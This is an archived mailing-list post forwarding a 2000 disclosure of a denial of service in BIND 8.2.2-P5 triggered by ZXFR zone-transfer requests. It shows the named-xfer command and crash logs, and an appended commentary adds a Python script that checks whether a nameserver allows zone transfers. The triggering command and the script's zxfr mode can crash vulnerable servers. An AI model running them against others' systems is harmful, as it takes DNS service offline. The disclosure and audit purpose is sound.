From owner-freebsd-isp Wed Nov  8 10:59:38 2000
Delivered-To: freebsd-isp@freebsd.org
Received: from gate.trident-uk.co.uk (mail.trident-uk.co.uk [195.166.16.10])
	by hub.freebsd.org (Postfix) with ESMTP id B62E537B479
	for ; Wed,  8 Nov 2000 10:59:34 -0800 (PST)
Received: from [194.207.93.139] by gate.trident-uk.co.uk for freebsd-isp@freebsd.org
	id SAA21018; Wed Nov  8 18:57:48 2000
Organization: Psi-Domain Ltd.
Subject: BIND 8.2.2-P5 Possible DOS
Date: Wed, 8 Nov 2000 19:02:24 +0000
X-Mailer: KMail [version 1.0.28]
Content-Type: text/plain
MIME-Version: 1.0
Message-Id: <00110819041604.01782@freefire.psi-domain.co.uk>
Content-Transfer-Encoding: 8bit
To: freebsd-isp@freebsd.org
From: Jamie Heckford
Reply-To: heckfordj@psi-domain.co.uk
Sender: owner-freebsd-isp@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Verified this earlier... make sure your nameservers are configured correctly!!

Nov 8 19:00:47 atlas named-xfer[78583]: [x.x.x.x] no SOA found for xxx, SOA query got rcode 3, aa 1, ancount 0, aucount 1
Nov 8 19:01:05 atlas named[276]: unsupported XFR (type ZXFR) of "xxx" (IN) to [x.x.x.x].1368
Nov 8 19:01:21 atlas named[276]: d_rcnt-- == 0
Nov 8 19:01:21 atlas /kernel: pid 276 (named), uid 53: exited on signal 6
Nov 8 19:01:21 atlas named[276]: d_rcnt-- == 0

----------  Forwarded Message  ----------
Subject: BIND 8.2.2-P5 Possible DOS
Date: Tue, 7 Nov 2000 13:40:49 +0100
From: "Fabio Pietrosanti (naif)"

Hi,

playing with BIND and the ZXFR feature (zone transfer compressed with a
possibly insecure execlp("gzip", "gzip", NULL);), I discovered a Denial of
Service against BIND 8.2.2-P5.

By default BIND 8.2.2-P5 is not compiled with ZXFR support unless you define
it with #define BIND_ZXFR, so it will refuse any ZXFR transfer, because it
doesn't support it.

But now what happens? Look here...

################################
zone to transfer: zone.pippo.com
dns server:       dns.pippo.com    192.168.1.1
me:               naif.gatesux.com 10.10.10.10

I send a Zone Transfer request using the "-Z" switch, which means that I wish
to use ZXFR. dns.pippo.com doesn't support ZXFR and has "allow-transfer{}"
not configured, so everyone could ask it for *.zone.pippo.com ...

[~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.pippo.com"

On the server's log:

Nov 7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com"
Nov 7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to [10.10.10.10].2284

Then the server "*** CRASHED ***".

I should assume that BIND 8.2.2-P5 is vulnerable (please someone test and
confirm this kind of DoS) and BIND 9.0.0 has no support for ZXFR.

[~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\} ';' | wc -l
234
[~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\} ';' | wc -l
0

A lot of DNS servers are misconfigured and allow zone transfers to any, so
they are DoS-able...

naif
naif@itapac.net

-------------------------------------------------------

-- 
Jamie Heckford
Chief Network Engineer
Psi-Domain - Innovative Linux Solutions. Ask Us How.
===================================
email: heckfordj@psi-domain.co.uk
web: http://www.psi-domain.co.uk/
tel: +44 (0)1737 789 246
fax: +44 (0)1737 789 245
mobile: +44 (0)7779 646 529
===================================

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-isp" in the body of the message
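The check both posters are really asking for is whether a nameserver hands out zone transfers to arbitrary clients at all; the crash above only bites servers whose allow-transfer is open. The script below is an added example written for this page, not code from the mail, from named-xfer or from BIND. It builds a transfer query by hand, sends it over TCP the way named-xfer does (2-byte length prefix, then the message), and classifies the first response: REFUSED (rcode 5) means allow-transfer is enforced, NOERROR with answer records means the zone leaks to anyone, and an early EOF mirrors the "premature EOF" named-xfer reported when the server died. Assumptions: QTYPE 256 is taken to be BIND 8's non-standard ns_t_zxfr value that named-xfer -Z sends, and the hostnames and addresses in the usage comment are placeholders. The corrective named.conf change is the one Fabio points at, an allow-transfer list restricted to your secondaries, for example `allow-transfer { 192.0.2.2; };` in the zone or options block (address is a placeholder).

```python
"""Zone-transfer exposure check (added example; not code from the mail or from BIND).

Builds a DNS transfer query by hand, sends it over TCP like named-xfer does,
and classifies the server's first response. A server with allow-transfer
restricted to its secondaries answers REFUSED (rcode 5); a server that hands
the zone to anyone answers NOERROR with records. QTYPE 256 is assumed to be
BIND 8's non-standard ns_t_zxfr, the type named-xfer -Z sends. Only point
this at servers you are responsible for.
"""
import socket
import struct
import sys

QTYPE_AXFR = 252
QTYPE_ZXFR = 256          # BIND 8 only; other servers reply NOTIMP/REFUSED
QCLASS_IN = 1
RCODE_NAMES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL",
               3: "NXDOMAIN", 4: "NOTIMP", 5: "REFUSED"}


def encode_name(name):
    """Encode a domain name as length-prefixed labels (RFC 1035 3.1)."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 0 < len(label) < 64:
            raise ValueError("bad label length in %r" % name)
        out += struct.pack("B", len(label)) + label.encode("ascii")
    return out + b"\x00"


def build_query(zone, qtype=QTYPE_AXFR, txid=0x1234):
    """12-byte header (flags 0: plain query, no RD) plus one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(zone) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_header(msg):
    """Pull the fields a transfer check cares about out of a response."""
    if len(msg) < 12:
        raise ValueError("truncated DNS header")
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {"id": txid, "qr": (flags >> 15) & 1, "aa": (flags >> 10) & 1,
            "rcode": flags & 0xF, "qdcount": qd, "ancount": an,
            "nscount": ns, "arcount": ar}


def classify(hdr):
    """REFUSED = allow-transfer works; OPEN = zone leaks to anyone."""
    if hdr["rcode"] == 5:
        return "REFUSED"
    if hdr["rcode"] == 0 and hdr["ancount"] > 0:
        return "OPEN"
    return RCODE_NAMES.get(hdr["rcode"], "RCODE%d" % hdr["rcode"])


def recv_exact(sock, n):
    """Read exactly n bytes or raise; a server that dies mid-transfer
    (the 'premature EOF' named-xfer reported) closes the socket early."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("EOF after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf


def check_transfer(server, zone, qtype=QTYPE_AXFR, timeout=5.0):
    """Return (verdict, header-or-None) for one transfer attempt over TCP.
    DNS over TCP prefixes each message with a 2-byte big-endian length."""
    query = build_query(zone, qtype)
    try:
        with socket.create_connection((server, 53), timeout=timeout) as s:
            s.sendall(struct.pack("!H", len(query)) + query)
            (length,) = struct.unpack("!H", recv_exact(s, 2))
            hdr = parse_header(recv_exact(s, length))
    except (ConnectionError, socket.timeout) as exc:
        return "NO_RESPONSE (%s)" % exc, None
    return classify(hdr), hdr


if __name__ == "__main__":
    # usage: python3 xfrcheck.py ns1.example.net example.net [axfr|zxfr]
    # (placeholder names; run against your own servers only)
    srv, zone = sys.argv[1], sys.argv[2]
    qt = QTYPE_ZXFR if len(sys.argv) > 3 and sys.argv[3] == "zxfr" else QTYPE_AXFR
    verdict, hdr = check_transfer(srv, zone, qt)
    print(verdict, hdr)
```

Run it once with axfr against each authoritative server from a host that is not a listed secondary; anything other than REFUSED is the misconfiguration Jamie is warning about, independently of which BIND version is behind it. The zxfr mode only matters for auditing BIND 8 hosts and will, on a vulnerable and open 8.2.2-P5, come back as NO_RESPONSE rather than a verdict.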